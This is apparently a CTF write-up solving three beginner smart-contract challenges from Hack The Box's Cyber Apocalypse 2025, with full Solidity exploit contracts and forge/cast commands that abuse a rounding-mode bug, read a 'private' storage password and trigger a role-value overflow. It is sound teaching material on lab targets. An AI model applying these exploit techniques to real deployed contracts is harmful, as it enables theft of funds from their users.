Writeup of the Blockchain Challenges from Cyber Apocalypse 2025
Intro
The 2025 edition of the Cyber Apocalypse CTF from Hack The Box featured three beginner-friendly Blockchain/Smart Contract Challenges. Here is a writeup covering all of them.
Connecting to the Network and interacting with the contracts
What initally caused me some confusion was how to connect to the chain and how to obtain the contract addresses as well as the flags, so here is a small explanation:
When starting the challenge you get two Addresses, the first one is the RPC-Url this is needed to connect to the chain, the second one can be connected to via Netcat it allows you to see the contract addresses, as well as the players private key. One the Flag which can be displayed as soon as the condition in the Setup.sol contract is met.
For interacting with the contracts and the chain I used the Foundry toolkit.
Eldorion
The first challenge tasks us to defeat Eldorion, which is done by using the attack() function to reduce the health variable from 300 to zero.
contract Eldorion {
uint256 public health = 300;
uint256 public lastAttackTimestamp;
uint256 private constant MAX_HEALTH = 300;
event EldorionDefeated(address slayer);
modifier eternalResilience() {
if (block.timestamp > lastAttackTimestamp) {
health = MAX_HEALTH;
lastAttackTimestamp = block.timestamp;
}
_;
}
function attack(uint256 damage) external eternalResilience {
require(damage <= 100, "Mortals cannot strike harder than 100");
require(health >= damage, "Overkill is wasteful");
health -= damage;
if (health == 0) {
emit EldorionDefeated(msg.sender);
}
}
function isDefeated() external view returns (bool) {
return health == 0;
}
}
The health resets every block, and we cannot deal more than 100 damage per attack, so we need to call attack 3 times in one block.
The in my opinion cleanest way to do this is via a smart contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
import { Eldorion } from "./Eldorion.sol";
contract Solver {
address addressElodrion;
function setAddressElo(address _addressElodrion) external {
addressElodrion = _addressElodrion;
}
function attack() public {
Eldorion elo = Eldorion(addressElodrion);
while (elo.health() > 99) {
elo.attack(100);
}
if (elo.health() > 0) {
elo.attack(elo.health());
}
}
}
When called the attack function of the Solver will check the health of Eldorion and reduce it to zero, solving the challenge.
This can be done via the following commands:
#Create the solver contract
forge create --rpc-url http://83.136.251.68:54862 --private-key $PRIVATE_KEY solver.sol:Solver
#Set the Eldorion Contract Address
cast send --rpc-url http://83.136.251.68:54862 --private-key $PRIVATE_KEY $SOLVER_ADDRESS "setAddressElo(address)" -- $ELDORION_ADDRESS
#Execute the attack
cast send --rpc-url http://83.136.251.68:54862 --private-key $PRIVATE_KEY $SOLVER_ADDRESS "attack()"
HeliosDEX
The HeliosDEX challenge requires us the exploit a bug in the HeliosDEX contract in order to obtain 20 Eth.
The DEX allows us to exchange Eth into three different ERC20 Tokens, it also gives us the option for a one-time token refund, allowing us to convert our ERC20 tokens into Eth.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/utils/math/Math.sol";
contract EldorionFang is ERC20 {
constructor(uint256 initialSupply) ERC20("EldorionFang", "ELD") {
_mint(msg.sender, initialSupply);
}
}
contract MalakarEssence is ERC20 {
constructor(uint256 initialSupply) ERC20("MalakarEssence", "MAL") {
_mint(msg.sender, initialSupply);
}
}
contract HeliosLuminaShards is ERC20 {
constructor(uint256 initialSupply) ERC20("HeliosLuminaShards", "HLS") {
_mint(msg.sender, initialSupply);
}
}
contract HeliosDEX {
EldorionFang public eldorionFang;
MalakarEssence public malakarEssence;
HeliosLuminaShards public heliosLuminaShards;
uint256 public reserveELD;
uint256 public reserveMAL;
uint256 public reserveHLS;
uint256 public immutable exchangeRatioELD = 2;
uint256 public immutable exchangeRatioMAL = 4;
uint256 public immutable exchangeRatioHLS = 10;
uint256 public immutable feeBps = 25;
mapping(address => bool) public hasRefunded;
bool public _tradeLock = false;
event HeliosBarter(address item, uint256 inAmount, uint256 outAmount);
event HeliosRefund(address item, uint256 inAmount, uint256 ethOut);
constructor(uint256 initialSupplies) payable {
eldorionFang = new EldorionFang(initialSupplies);
malakarEssence = new MalakarEssence(initialSupplies);
heliosLuminaShards = new HeliosLuminaShards(initialSupplies);
reserveELD = initialSupplies;
reserveMAL = initialSupplies;
reserveHLS = initialSupplies;
}
modifier underHeliosEye {
require(msg.value > 0, "HeliosDEX: Helios sees your empty hand! Only true offerings are worthy of a HeliosBarter");
_;
}
modifier heliosGuardedTrade() {
require(_tradeLock != true, "HeliosDEX: Helios shields this trade! Another transaction is already underway. Patience, traveler");
_tradeLock = true;
_;
_tradeLock = false;
}
function swapForELD() external payable underHeliosEye {
uint256 grossELD = Math.mulDiv(msg.value, exchangeRatioELD, 1e18, Math.Rounding(0));
uint256 fee = (grossELD * feeBps) / 10_000;
uint256 netELD = grossELD - fee;
require(netELD <= reserveELD, "HeliosDEX: Helios grieves that the ELD reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
reserveELD -= netELD;
eldorionFang.transfer(msg.sender, netELD);
emit HeliosBarter(address(eldorionFang), msg.value, netELD);
}
function swapForMAL() external payable underHeliosEye {
uint256 grossMal = Math.mulDiv(msg.value, exchangeRatioMAL, 1e18, Math.Rounding(1));
uint256 fee = (grossMal * feeBps) / 10_000;
uint256 netMal = grossMal - fee;
require(netMal <= reserveMAL, "HeliosDEX: Helios grieves that the MAL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
reserveMAL -= netMal;
malakarEssence.transfer(msg.sender, netMal);
emit HeliosBarter(address(malakarEssence), msg.value, netMal);
}
function swapForHLS() external payable underHeliosEye {
uint256 grossHLS = Math.mulDiv(msg.value, exchangeRatioHLS, 1e18, Math.Rounding(3));
uint256 fee = (grossHLS * feeBps) / 10_000;
uint256 netHLS = grossHLS - fee;
require(netHLS <= reserveHLS, "HeliosDEX: Helios grieves that the HSL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
reserveHLS -= netHLS;
heliosLuminaShards.transfer(msg.sender, netHLS);
emit HeliosBarter(address(heliosLuminaShards), msg.value, netHLS);
}
function oneTimeRefund(address item, uint256 amount) external heliosGuardedTrade {
require(!hasRefunded[msg.sender], "HeliosDEX: refund already bestowed upon thee");
require(amount > 0, "HeliosDEX: naught for naught is no trade. Offer substance, or be gone!");
uint256 exchangeRatio;
if (item == address(eldorionFang)) {
exchangeRatio = exchangeRatioELD;
require(eldorionFang.transferFrom(msg.sender, address(this), amount), "ELD transfer failed");
reserveELD += amount;
} else if (item == address(malakarEssence)) {
exchangeRatio = exchangeRatioMAL;
require(malakarEssence.transferFrom(msg.sender, address(this), amount), "MAL transfer failed");
reserveMAL += amount;
} else if (item == address(heliosLuminaShards)) {
exchangeRatio = exchangeRatioHLS;
require(heliosLuminaShards.transferFrom(msg.sender, address(this), amount), "HLS transfer failed");
reserveHLS += amount;
} else {
revert("HeliosDEX: Helios descries forbidden offering");
}
uint256 grossEth = Math.mulDiv(amount, 1e18, exchangeRatio);
uint256 fee = (grossEth * feeBps) / 10_000;
uint256 netEth = grossEth - fee;
hasRefunded[msg.sender] = true;
payable(msg.sender).transfer(netEth);
emit HeliosRefund(item, amount, netEth);
}
}
The swap functions use the mulDiv() function from OpenZeppelin. What looked suspicious about them was the Math.Rounding() parameter of the function, which is called with different values for each token. I initially believed this number was the precision, but a look at the source code shows that it defines the rounding mode:
library Math {
enum Rounding {
Floor, // Toward negative infinity
Ceil, // Toward positive infinity
Trunc, // Toward zero
Expand // Away from zero
}
}
Rounding mode 3 (Away from zero) on the swapForHLS() function should allow us to exchange 1 wei for 1 HLS. The HLS can then be refunded into 0.1 Eth. In order to do this I build the following contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
interface IHeliosDEX {
function swapForHLS() external payable;
function oneTimeRefund(address item, uint256 amount) external;
function heliosLuminaShards() external view returns (address);
}
interface IERC20 {
function approve(address spender, uint256 amount) external returns (bool);
function balanceOf(address account) external view returns (uint256);
}
contract HeliosExploit {
IHeliosDEX public immutable heliosDEX;
IERC20 public immutable heliosLuminaShards;
event ExploitStep(uint256 weiSent, uint256 hlsReceived);
event RefundResult(uint256 hlsRefunded, uint256 ethReceived);
constructor(address _heliosDEX) {
heliosDEX = IHeliosDEX(_heliosDEX);
heliosLuminaShards = IERC20(heliosDEX.heliosLuminaShards());
}
// Exploit: Call swapForHLS with 1 wei repeatedly
function exploit(uint256 iterations) external payable {
require(msg.value >= iterations, "Send enough ETH for iterations");
for (uint256 i = 0; i < iterations; i++) {
uint256 hlsBefore = heliosLuminaShards.balanceOf(address(this));
heliosDEX.swapForHLS{value: 1 wei}();
uint256 hlsAfter = heliosLuminaShards.balanceOf(address(this));
uint256 hlsReceived = hlsAfter - hlsBefore;
emit ExploitStep(1 wei, hlsReceived);
}
// Refund excess ETH sent beyond iterations
if (msg.value > iterations) {
payable(msg.sender).transfer(msg.value - iterations);
}
}
// Approve and refund all collected HLS
function refund() external {
uint256 hlsBalance = heliosLuminaShards.balanceOf(address(this));
require(hlsBalance > 0, "No HLS to refund");
// Approve HeliosDEX to spend HLS
require(heliosLuminaShards.approve(address(heliosDEX), hlsBalance), "Approval failed");
// Refund all HLS
heliosDEX.oneTimeRefund(address(heliosLuminaShards), hlsBalance);
}
// Allow contract to receive ETH from refunds
receive() external payable {}
// Withdraw any ETH (for testing)
function withdrawETH() external {
uint256 balance = address(this).balance;
payable(msg.sender).transfer(balance);
}
}
The exploit function will repeatedly exchange 1 wei for 1 HLS, once we have enough HLS we can call the refund() function followed by the withdrawETH() function in order to solve the challenge. This can be done with the following commands:
forge create --rpc-url http://94.237.55.15:54574 --private-key $PRIVATE_KEY HeliosExploit.sol:HeliosExploit --constructor-args $DEX_ADDRESS
cast send --rpc-url http://94.237.55.15:54574 --private-key $PRIVATE_KEY $EXPLOIT_ADDRESS --value 800 "exploit(uint256)" -- 800
cast send --rpc-url http://94.237.55.15:54574 --private-key $PRIVATE_KEY $EXPLOIT_ADDRESS "refund()"
cast send --rpc-url http://94.237.55.15:54574 --private-key $PRIVATE_KEY $EXPLOIT_ADDRESS "withdrawETH()"
EldoriaGate
In order to solve EldoriaGate we need checkUrsurper() to return true, for this to happen we need to obtain a secret password and set our role variable to an (normally) impossible value. The challenge consists out of these two contracts:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
contract EldoriaGateKernel {
bytes4 private eldoriaSecret;
mapping(address => Villager) public villagers;
address public frontend;
uint8 public constant ROLE_SERF = 1 << 0;
uint8 public constant ROLE_PEASANT = 1 << 1;
uint8 public constant ROLE_ARTISAN = 1 << 2;
uint8 public constant ROLE_MERCHANT = 1 << 3;
uint8 public constant ROLE_KNIGHT = 1 << 4;
uint8 public constant ROLE_BARON = 1 << 5;
uint8 public constant ROLE_EARL = 1 << 6;
uint8 public constant ROLE_DUKE = 1 << 7;
struct Villager {
uint id;
bool authenticated;
uint8 roles;
}
constructor(bytes4 _secret) {
eldoriaSecret = _secret;
frontend = msg.sender;
}
modifier onlyFrontend() {
assembly {
if iszero(eq(caller(), sload(frontend.slot))) {
revert(0, 0)
}
}
_;
}
function authenticate(address _unknown, bytes4 _passphrase) external onlyFrontend returns (bool auth) {
assembly {
let secret := sload(eldoriaSecret.slot)
auth := eq(shr(224, _passphrase), secret)
mstore(0x80, auth)
mstore(0x00, _unknown)
mstore(0x20, villagers.slot)
let villagerSlot := keccak256(0x00, 0x40)
let packed := sload(add(villagerSlot, 1))
auth := mload(0x80)
let newPacked := or(and(packed, not(0xff)), auth)
sstore(add(villagerSlot, 1), newPacked)
}
}
function evaluateIdentity(address _unknown, uint8 _contribution) external onlyFrontend returns (uint id, uint8 roles) {
assembly {
mstore(0x00, _unknown)
mstore(0x20, villagers.slot)
let villagerSlot := keccak256(0x00, 0x40)
mstore(0x00, _unknown)
id := keccak256(0x00, 0x20)
sstore(villagerSlot, id)
let storedPacked := sload(add(villagerSlot, 1))
let storedAuth := and(storedPacked, 0xff)
if iszero(storedAuth) { revert(0, 0) }
let defaultRolesMask := ROLE_SERF
roles := add(defaultRolesMask, _contribution)
if lt(roles, defaultRolesMask) { revert(0, 0) }
let packed := or(storedAuth, shl(8, roles))
sstore(add(villagerSlot, 1), packed)
}
}
function hasRole(address _villager, uint8 _role) external view returns (bool hasRoleFlag) {
assembly {
mstore(0x0, _villager)
mstore(0x20, villagers.slot)
let villagerSlot := keccak256(0x0, 0x40)
let packed := sload(add(villagerSlot, 1))
let roles := and(shr(8, packed), 0xff)
hasRoleFlag := gt(and(roles, _role), 0)
}
}
}
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
import { EldoriaGateKernel } from "./EldoriaGateKernel.sol";
contract EldoriaGate {
EldoriaGateKernel public kernel;
event VillagerEntered(address villager, uint id, bool authenticated, string[] roles);
event UsurperDetected(address villager, uint id, string alertMessage);
struct Villager {
uint id;
bool authenticated;
uint8 roles;
}
constructor(bytes4 _secret) {
kernel = new EldoriaGateKernel(_secret);
}
function enter(bytes4 passphrase) external payable {
bool isAuthenticated = kernel.authenticate(msg.sender, passphrase);
require(isAuthenticated, "Authentication failed");
uint8 contribution = uint8(msg.value);
(uint villagerId, uint8 assignedRolesBitMask) = kernel.evaluateIdentity(msg.sender, contribution);
string[] memory roles = getVillagerRoles(msg.sender);
emit VillagerEntered(msg.sender, villagerId, isAuthenticated, roles);
}
function getVillagerRoles(address _villager) public view returns (string[] memory) {
string[8] memory roleNames = [
"SERF",
"PEASANT",
"ARTISAN",
"MERCHANT",
"KNIGHT",
"BARON",
"EARL",
"DUKE"
];
(, , uint8 rolesBitMask) = kernel.villagers(_villager);
uint8 count = 0;
for (uint8 i = 0; i < 8; i++) {
if ((rolesBitMask & (1 << i)) != 0) {
count++;
}
}
string[] memory foundRoles = new string[](count);
uint8 index = 0;
for (uint8 i = 0; i < 8; i++) {
uint8 roleBit = uint8(1) << i;
if (kernel.hasRole(_villager, roleBit)) {
foundRoles[index] = roleNames[i];
index++;
}
}
return foundRoles;
}
function checkUsurper(address _villager) external returns (bool) {
(uint id, bool authenticated , uint8 rolesBitMask) = kernel.villagers(_villager);
bool isUsurper = authenticated && (rolesBitMask == 0);
emit UsurperDetected(
_villager,
id,
"Intrusion to benefit from Eldoria, without society responsibilities, without suspicions, via gate breach."
);
return isUsurper;
}
}
The secret variable is set to private, meaning we can not directly call it via a function, but since all contract data is uploaded to the blockchain we can just read it from there using cast storage and forge inspect.
forge inspect allows us the check the slot in which the password is saved.
cast storage allows us to read the data from that slot.
We will have to obtain the address of the Kernel from the Gate contract and then obtain the password from the Kernel. This can be done with the following commands:
#Get slot layout for EldoriaGate
forge inspect EldoriaGate.sol:EldoriaGate storage --pretty $GATE_ADDRESS
#Get slot layout for EldoriaGateKernel
forge inspect EldoriaGateKernel.sol:EldoriaGateKernel storage --pretty
#Get the address of the kernel
cast storage --rpc-url http://94.237.59.98:37376 $GATE_ADDRESS 0
#Get the passsword
cast storage --rpc-url http://94.237.59.98:37376 $KERNEL_ADDRESS 0
This returns the 4 byte password deadfade.
Now that we have the password we need to set our role value to zero. The roles are saved as a 8 bit value, by default only the lowest bit is set to one, we need to set it to zero. The only way to interact with the role value is by using the enter() function. The roles value gets increased depending on how much we send, since the function uses unsafe assembly we can cause an integer overflow and use it to set the lowest bit to zero.
cast send --rpc-url http://94.237.59.98:37376 --private-key $PRIVATE_KEY $GATE_ADDRESS --value 255 "enter(bytes4)" -- deadfade
This causes the checkUrsurper() function to return true, solving this challenge.